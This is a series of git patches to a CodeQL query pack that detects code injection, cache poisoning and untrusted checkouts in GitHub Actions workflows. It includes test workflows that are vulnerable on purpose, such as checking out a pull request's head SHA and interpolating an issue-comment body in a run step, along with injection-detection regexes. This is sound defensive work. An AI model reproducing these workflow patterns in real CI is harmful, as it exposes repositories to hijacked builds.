.github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607d..92d5a0b5ce1 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -4,6 +4,5 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9adfa3cee7c..544d26da9b7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,2 +1,3 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 28af21c556237ec784e0b0e1e1ae22c2484514c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 08:57:43 +0200 Subject: [PATCH 0317/1267] Update ql suites --- ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll | 5 +++-- ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll | 5 +++-- ql/src/Debug/partial.ql | 2 ++ ql/src/codeql-suites/actions-all.qls | 4 ++++ ql/src/codeql-suites/actions-code-scanning.qls | 2 ++ 5 files changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 302e8d5bb8d..cd049cccf4e 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -13,8 +13,9 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index ead69480d8a..a692c6e5874 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -26,8 +26,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 27cad8b98a4..cb8ba7873d8 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -5,6 +5,8 @@ * @precision low * @problem.severity error * @id actions/test-dataflow + * @tags actions + * debug */ import actions diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 32b9b5800cd..be9be866620 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -4,3 +4,7 @@ kind: - problem - path-problem +- exclude: + tags contain: + - debug + - model-generator diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 7d6c94e0c8c..d0fd74736ce 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -17,3 +17,5 @@ tags contain: - experimental - testing + - debug + - model-generator From 284c52f9728b1e302ba48eba369e585672afdcb2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 10:54:37 +0200 Subject: [PATCH 0318/1267] Bump qlpack versions --- .../actions/security/CachePoisoningQuery.qll | 61 ++++++++----------- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 22 +++++-- .../CWE-349/CachePoisoningByCodeInjection.ql | 24 +++++--- ql/src/qlpack.yml | 2 +- .../CWE-349/.github/workflows/test18.yml | 31 ++++++++++ 6 files changed, 91 insertions(+), 51 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 318548859b5..e80ea71c958 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -17,51 +17,40 @@ string defaultBranchNames() { result = default_branch_name ) or - not exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) - ) and + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and result = ["main", "master"] } -predicate runsOnDefaultBranch(Job j) { - exists(Event e | - j.getATriggerEvent() = e and +predicate runsOnDefaultBranch(Event e) { + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") or - e.getName() = "push" and + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and e.getAPropertyValue("branches") = defaultBranchNames() or - e.getName() = "pull_request_target" and - ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() - or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() - ) + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) - or - j.getATriggerEvent().getName() = "workflow_call" and - exists(ExternalJob call | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - runsOnDefaultBranch(call) - ) } abstract class CacheWritingStep extends Step { } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9acfb3035a4..bf05e80e0a6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.32 +version: 0.0.33 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index d81c13021c1..a6dc7e14fdd 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -16,15 +16,25 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout, Step s +from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where - // the workflow runs in the context of the default branch - runsOnDefaultBranch(j) and + j.getATriggerEvent() = e and + // job can be triggered by an external user + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and // the job checkouts untrusted code from a pull request // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and - // job can be triggered by an external user - j.getATriggerEvent().isExternallyTriggerable() and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) @@ -35,7 +45,7 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and s instanceof PoisonableStep and - // excluding privileged workflows since they can be easily exploited in similar circumstances + // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 5ed3c966ad3..8fdebdbde18 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -17,16 +17,26 @@ import codeql.actions.security.CodeInjectionQuery import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e where - CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() and + j.getATriggerEvent() = e and // job can be triggered by an external user - j.getATriggerEvent().isExternallyTriggerable() and - // excluding privileged workflows since they can be easily exploited in similar circumstances + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() and - // The workflow runs in the context of the default branch - runsOnDefaultBranch(j) + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5637bef68a0..2f79bddd77e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.32 +version: 0.0.33 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml new file mode 100644 index 00000000000..6bfdc5b7d50 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml @@ -0,0 +1,31 @@ +name: Test + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version-file: .nvmrc + + - name: Install NPM dependencies + run: npm ci + + - name: Rebuild the dist/ directory + run: npm run build + + - name: Compare the expected and actual dist/ directories + run: bin/check-build-output-in-dist-directory From 2c96127425896a9f6433970dae012676d0745896 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 16:34:52 +0200 Subject: [PATCH 0319/1267] Improve event context sources + test --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- .../Security/CWE-094/.github/workflows/test6.yml | 16 ++++++++++++++++ 2 files changed, 17 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 5f2d36e7cd8..7217796d138 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -200,7 +200,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { or regexp = pathEvent() and flag = "filename" ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") + normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml new file mode 100644 index 00000000000..535b9bd24be --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml @@ -0,0 +1,16 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + { + echo "recreate_vm=${{ contains(github.event.comment.body, 'recreate-vm') }}" + } >> $GITHUB_OUTPUT + From d344d9b97ad8811b8d2b72953bff3b7516744825 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 0320/1267] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 25 files changed, 310 insertions(+), 286 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf45..feafe4f68bb 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa8..8203a54dfeb 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef6..2e3c13f164c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd53927..17b29f57025 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() @@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db91..96568f86db3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20..2fd062e7660 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b..b8647339d24 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c12..00000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a6..48045dbf679 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 31e367ac317..0a5bfe433e9 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,8 +1,8 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | -| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 6540b191068..87c185fb5e1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | -| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | 